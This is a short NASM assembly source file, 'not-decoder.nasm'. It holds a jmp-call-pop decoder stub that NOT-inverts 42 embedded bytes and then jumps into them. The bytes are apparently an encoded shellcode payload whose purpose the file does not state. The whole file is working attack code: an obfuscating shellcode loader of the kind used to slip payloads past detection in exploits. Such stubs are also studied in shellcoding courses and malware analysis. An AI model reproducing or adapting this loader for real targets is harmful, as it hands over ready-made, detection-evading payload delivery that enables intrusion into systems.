; Filename: not-decoder.nasm
; Author: Cole Strickler




global _start


section .text

_start:
	jmp short call_shellcode



decoder:
	pop esi
	xor ecx, ecx
	mov cl, 42

decode:
	not byte [esi]
	inc esi
	loop decode
	jmp short EncodedShellcode

call_shellcode:
	
	call decoder
	EncodedShellcode: db 0xcf,0x40,0x50,0xfc,0xcf,0x25,0x4d,0xff,0xcf,0x2e,0xae,0x98,0x8e,0x94,0x9c,0xf6,0x98,0x91,0xe0,0xa9,0x91,0x98,0xb8,0x9b,0x94,0x94,0x77,0x1f,0x4e,0xf4,0x33,0x80,0xcf,0x40,0x50,0xff,0xcf,0x25,0x4d,0xfb,0x33,0x80

